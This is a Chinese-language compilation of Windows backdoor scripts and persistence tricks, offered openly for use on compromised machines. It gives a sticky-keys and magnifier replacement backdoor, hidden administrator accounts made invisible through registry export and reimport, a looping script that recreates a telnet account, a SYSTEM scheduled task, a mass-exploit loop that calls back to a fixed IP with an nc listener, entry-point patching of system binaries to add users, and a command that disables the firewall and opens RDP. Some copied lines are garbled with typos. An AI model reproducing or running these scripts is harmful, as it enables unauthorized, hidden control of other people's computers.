几个后门的批处理

Shift后门
-----------------------------------------
@echo off
cls
echo ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
echo ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
echo.
echo Shift后门 By:qing QQ:33089632
echo.
echo 使用方法:本文件执行完毕后,
echo 在终端界面按Shift 5次即可登陆系统!
echo ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
echo ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
echo.
copy c:/windows/explorer.exe c:/windows/system32/sethc.exe
echo 完成百分之 50
copy c:/windows/system32/sethc.exe c:/windows/system32/dllcache/sethc.exe
echo 完成百分之 80
attrib c:/windows/system32/sethc.exe +h
echo 完成百分之 90
attrib c:/windows/system32/dllcache/sethc.exe +h
echo 完成百分之 100
cls
echo.
echo ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
echo ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
echo 后门安装完毕！
echo.
echo 感谢您使用Shift后门
echo.
echo By：qing QQ: 33089632
echo.
echo http://www.shenmicaobi.com/
echo.
echo ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
echo ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
echo.
echo. & pause
exit
--------------------------------------------------------------

 

第三个:自动踢人(3389肉机保护自己专用)
@echo off
logoff 1
del log.bat
logoff后面的1改成自己登陆的ID号,用query user查看

第四个: 批量自动溢出
@for /f %%i in (result.txt) do 42 %%i 58.44.89.158 521
先自己用NC监听端口,多开几个,然后指行,就自动溢出

 

schtasks /create /tn "常驻" /tr C:WINDOWSauto.bat /sc minute /mo 30 /ru "system"
这样就在对方电脑上建立了一个以SYSTEM权限运行的计划任务，这个计划任务每隔30分钟运行一次

建立注册表也不能查看到的账户
net user admins$ 1234567 /add
net localgroup administrators admins$ /add
Echo HKEY_LOCAL_MACHINE/SAM [1] >>c:/tem.ini
Echo HKEY_LOCAL_MACHINE/SAM/SAM [1] >>c:/tem.ini
Echo HKEY_LOCAL_MACHINE/SAM/SAM/Domains [1] >>c:/tem.ini
Echo HKEY_LOCAL_MACHINE/SAM/SAM/Domains/Account [1] >>c:/tem.ini
Echo HKEY_LOCAL_MACHINE/SAM/SAM/Domains/Account/Users [1] >>c:/tem.ini
Echo HKEY_LOCAL_MACHINE/SAM/SAM/Domains/Account/Users/Names [1] >>c:/tem.ini
regini c:/tem.ini
regedit /e c:/1.reg HKEY_LOCAL_MACHINE/SAM/SAM/Domains/Account/Users
net user admins$ /del
regedit /s c:/1.reg
Echo HKEY_LOCAL_MACHINE/SAM/SAM/Domains/Account/Users/Names [0] >c:/tem.ini
Echo HKEY_LOCAL_MACHINE/SAM/SAM/Domains/Account/Users [0] >>c:/tem.ini
Echo HKEY_LOCAL_MACHINE/SAM/SAM/Domains/Account [0] >>c:/tem.ini
Echo HKEY_LOCAL_MACHINE/SAM/SAM/Domains [0] >>c:/tem.ini
Echo HKEY_LOCAL_MACHINE/SAM/SAM [0] >>c:/tem.ini
Echo HKEY_LOCAL_MACHINE/SAM/ [0] >>c:/tem.ini
regini c:/tem.ini
del c:/tem.ini
del c:/1.reg
del %0
===============================================

循环不断地建立账户
    @echo off
    @attrib +s + r xyt.bat
    @net user hack95$ /del
    @net user hack95$ 123456. /add            
    @net localgroup administrators hack95$ /add
    @tlntadmn config sec = -ntlm

    @net  stop schedule
    @net start Schedule
    @echo at 11:00 c:/WINNT/SYSTEM32/log.bat > c:/WINNT/SYSTEM32/xyt.bat
    @echo at 23:00 c:/WINNT/SYSTEM32/log.bat >> c:/WINNT/SYSTEM32/xyt.bat
    @at 11:05 c:/WINNT/SYSTEM32/xyt.bat
    @at 23:05 c:/WINNT/SYSTEM32/xyt.bat
    @net stop telnet 
    @net start telnet
    @exit

   这样就会循环运行我们的程序了，即使被人停下来，过几个小时，又回重新运行，呵呵~~
    运行后TELNET IP上去，用户名为hack95$，密码为123456.

 

　　copy c：＼wmdows＼explorer.exe c：＼windows＼system32＼sethc.exe
　　copy c：＼wmdows＼system32＼sethc.exe c：＼windows＼system32＼dUcache＼sethc.exe
　　attrib c：＼windows＼system32＼sethc.exe+h
　　atmb c：＼wmdows＼svstem32＼dUcache＼sethc.exe+h

留个放大镜后门
　　上面利用的是粘滞键辅助工具。其实系统中还有其它的辅助工具。比如“放大镜”——按下Win+U组合键，即可打开放大镜辅助工具。可以用与上面相同的方法来创建一个后门。不过这里我们利用工具来完成操作，并且还要为后门加上一个密码。
　　运行“放大镜后门生成器”，在“后门启动密码”中输入要设置的后门密码。然后点击“生成”按钮，指定生成文件名路径为“C：＼ivy.exe”。然后点击“开始”菜单－“运行”。输入命令“CMD”。回车后打开命令提示符窗口。在命令窗口中执行如下命令：
　　 copy %systemroot%/system32/magnify.exe %systemroot%/system32/nagnify.exe
copy C /ivy exe %systemroot%/system32/magmfy.exe
　　 copy C:/ivy.exe %systemroot%/system32/dllcache/magnify.exe
　　执行命令成功后，后门就创建成功了。以后在本地或3389远程登录界面中。按下Win+U组合键，打开辅助工具对话框，选择“放大镜”，点击“启动”按钮，要求输入设定的后门启动密码。确定后。打开后门程序，可执行“cmd.exe”和程序自己添加自定义用户。直接输入要添加的用户名和密码。点击“添加”按钮即可。要执行CMD命令的话，可点击“执行CMD命令”按钮，即可打开CMD命令提示符窗口。

 

1.用bat转exe工具将建立账号的bat转成exe，替换掉系统的常用程序，如sougouupdate
2.建立只能在注册表里看见的隐藏账号，先在cmd下建立个管理员账号，再在注册表里将相对应的账号的注册项导出，再删除该账号，然后再导入这两个注册表项即可。
3.在系统关键程序中添加附加数据，代码：cmd /c net user hack95$ 123456 /add&net localgroup administrators hack95$ /add&net user hack95$ /active:yes
首先用OD打开，记下入口点，然后找个0区域，记下该地址，然后右键编辑在ASCII栏里粘贴如上代码，再加入汇编代码push 0（表示隐藏运行），并记下此地址，再push+代码开始的地址，再在下一地址汇编call WinExec，最后跳回原来的入口点。

4.bat转exe，再用易语言将该exe与记事本等常用文件捆绑替换掉系统里的、
==================================================
一:在explorer.exe中加保持2003系统开3389代码（2000系统的有一点变化，大家自己替换）
cmd /c net stop sharedaccess&echo Windows Registry Editor Version 5.00>>c:/1.reg&echo. >>c:/1.reg&echo [HKEY_LOCAL_MACHINE/SYSTEM/CurrentControlSet/Control/Terminal Server]>>c:/1.reg&echo "fDenyTSConnections"=dword:00000000>>c:/1.reg&echo [HKEY_LOCAL_MACHINE/SYSTEM/CurrentControlSet/Control/Terminal Server/Wds/rdpwd/Tds/tcp]>>c:/1.reg&echo "PortNumber"=dword:00000c55>>c:/1.reg&echo [HKEY_LOCAL_MACHINE/SYSTEM/CurrentControlSet/Control/Terminal Server/WinStations/RDP-Tcp]>>c:/1.reg&echo "PortNumber"=dword:00000c55>>c:/1.reg&regedit /s c:/1.reg&
del c:/1.reg